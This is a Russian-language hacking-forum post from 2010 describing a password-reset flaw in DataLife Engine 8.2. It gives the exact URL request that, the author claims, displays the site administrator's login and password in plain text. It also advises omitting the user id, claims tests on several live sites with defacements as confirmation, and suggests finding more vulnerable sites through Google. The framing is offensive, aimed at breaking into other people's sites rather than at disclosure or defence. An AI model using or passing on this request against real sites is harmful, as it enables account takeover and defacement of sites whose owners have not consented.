1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

DLE- datalife engine.

Тема в разделе "H4X S0FTW4RE", создана пользователем spectre, 8 мар 2010.

  1. spectre IPv6

    spectre
    TS
    WebVoice
    Регистрация:
    30 мар 2007
    Сообщения:
    200
    Симпатии:
    2
    Обнаружена уязвимость в версии 8.2

    http://домен.зона/index.php?do=lostpassword&douser=1

    При вызове в браузере любой может сгенерировать новый пароль от аккаунта(ов).

    http://домен.зона/index.php?do=lostpassword&douser= лучше запрос делать такого вида без id так как с id либо будет выслан на мыло либо аккаунт будет залочен,а запрос такого вида выдаст на странице имя и пасс админа в открытом виде проверено на нескольких сайтах, в ленте дефейсов подтверждение,с помощью google легко можно найти много бажных движков.